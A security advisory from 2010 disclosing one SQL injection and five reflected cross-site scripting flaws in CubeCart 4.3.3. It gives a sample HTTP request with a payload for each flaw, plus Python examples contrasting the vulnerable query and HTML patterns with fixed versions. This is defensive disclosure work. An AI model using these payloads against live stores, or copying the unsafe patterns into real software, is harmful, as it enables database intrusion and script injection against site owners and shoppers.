CubeCart 4.3.3 SQL Injection / Cross Site Scripting

11 Sep 2010 | Reported by Bogdan Calin | Type: packetstorm | Source: packetstormsecurity.com

Security vulnerabilities found in CubeCart 4.3.3, including SQL injection and Cross-site Scripting in different parameters

We are continuing with the list of security vulnerabilities found in a  
number of web applications while testing our latest version of Acunetix  
WVS v7. In this blog post, we will look into the details of a number of  
security problems discovered by Acunetix WVS in CubeCart.  
  
"CubeCart is a fully featured ecommerce shopping cart solution used by  
over a million store owners around the world."  
  
The following web vulnerabilities were found in CubeCart version 4.3.3:  
  
1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.  
2. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.  
3. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.  
4. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.  
5. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.  
6. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.  
  
Technical details about each web vulnerability are below:  
  
1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.  
  
Additional details:  
SQL query:  
SELECT id FROM cube_CubeCart_search WHERE searchstr='''  
  
Sample HTTP Request:  
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect: enabled  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
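The query quoted above shows the root cause: the single quote sent in searchStr became part of the SQL text instead of staying inside the string literal. As an added example (not CubeCart's code), the following Python models that string concatenation against an in-memory SQLite table named after the one in the advisory (the schema and the stored rows are assumptions) and contrasts it with a parameterized query; the same `'` input yields exactly the malformed statement above in the first case and an ordinary empty result in the second.

```python
import sqlite3

# Assumed schema: only the table and column names come from the advisory's query.
SCHEMA = "CREATE TABLE cube_CubeCart_search (id INTEGER PRIMARY KEY, searchstr TEXT)"
SAMPLE_ROWS = [("laptop",), ("o'brien bag",)]  # constructed sample data


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.executemany("INSERT INTO cube_CubeCart_search (searchstr) VALUES (?)", SAMPLE_ROWS)
    return db


def build_concat_query(search_str):
    # Vulnerable pattern implied by the advisory: the raw parameter is pasted
    # between the quotes, so a quote in the input ends the string literal early.
    return "SELECT id FROM cube_CubeCart_search WHERE searchstr='" + search_str + "'"


def lookup_concat(db, search_str):
    return [row[0] for row in db.execute(build_concat_query(search_str))]


def lookup_param(db, search_str):
    # Hardened form: the driver binds the value separately from the SQL text,
    # so quotes in the input are data, never syntax.
    query = "SELECT id FROM cube_CubeCart_search WHERE searchstr=?"
    return [row[0] for row in db.execute(query, (search_str,))]


def compare(search_str):
    """Run both variants on the same input; report matching ids or the parser error."""
    db = make_db()
    try:
        concat = lookup_concat(db, search_str)
    except sqlite3.OperationalError as exc:
        concat = "error: " + str(exc)
    return {"concat": concat, "param": lookup_param(db, search_str)}


if __name__ == "__main__":
    # A normal term, the scanner's probe, and a legitimate value containing a quote.
    for probe in ("laptop", "'", "o'brien bag"):
        print(repr(probe), compare(probe))
```

Note that the concatenated form also breaks on legitimate input such as a surname with an apostrophe, so the parameterized query is a correctness fix as well as a security one.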
  
2. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.  
  
Attack details  
URL encoded GET input amount was set to " onmouseover=prompt(949088) bad="  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
3. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.  
  
Attack details  
URL encoded GET input cartId was set to " onmouseover=prompt(932890) bad="  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
4. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.  
  
Attack details  
URL encoded GET input email was set to " onmouseover=prompt(908306) bad="  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
  
5. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.  
  
Attack details  
URL encoded GET input transId was set to " onmouseover=prompt(998313) bad="  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
6. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.  
  
Attack details  
URL encoded GET input transStatus was set to " onmouseover=prompt(923101) bad="  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
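Items 2 to 6 share one root cause: a request parameter is written into an HTML attribute between double quotes without output encoding, so the leading `"` of the probe closes the attribute and the remainder is parsed as new attributes. As an added example (not CubeCart's code), the Python below renders the five return.php parameters into hidden inputs two ways (the form layout is an assumption; the parameter names and the probe are from the advisory), then feeds each result to Python's HTML parser to see whether an `on*` handler attribute emerges; with `html.escape(..., quote=True)` the probe survives only as an ordinary attribute value.

```python
from html import escape
from html.parser import HTMLParser

# Parameter names come from the advisory; the hidden-input form is assumed.
PARAMS = ("amount", "cartId", "email", "transId", "transStatus")
# The scanner's probe, decoded from the URL quoted in the advisory.
ADVISORY_PAYLOAD = '" onmouseover=prompt(949088) bad="'


def render_naive(values):
    # Vulnerable pattern described in the advisory: the raw value is dropped
    # between double quotes, so a quote in it ends the attribute early.
    return "".join(
        f'<input type="hidden" name="{k}" value="{values.get(k, "")}">' for k in PARAMS
    )


def render_escaped(values):
    # Hardened form: quote=True turns " into &quot; (and < > & into entities),
    # so the browser sees one attribute whose value is the original string.
    return "".join(
        f'<input type="hidden" name="{k}" value="{escape(values.get(k, ""), quote=True)}">'
        for k in PARAMS
    )


class TagCollector(HTMLParser):
    """Records every start tag with its parsed attributes, as a browser would."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(html):
    collector = TagCollector()
    collector.feed(html)
    return collector.tags


def event_handlers(html):
    """Names of on* attributes after parsing; a non-empty list means the value broke out."""
    return sorted(n for _, attrs in parse_tags(html) for n in attrs if n.startswith("on"))


def reflected_value(html, param):
    """The decoded value the browser assigns to the named hidden input."""
    return next(a["value"] for _, a in parse_tags(html) if a.get("name") == param)
```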
  
These vulnerabilities were reported to the CubeCart team on 22/7/2010  
via the support system on their website and they were fixed in the latest  
version of CubeCart. If you are using CubeCart, download the latest  
version from their website.  
  
--   
Bogdan Calin - bogdan [at] acunetix.com  
CTO  
Acunetix Ltd. - http://www.acunetix.com  
Acunetix Web Security Blog - http://www.acunetix.com/blog  
Follow us on Twitter - http://www.twitter.com/acunetix  
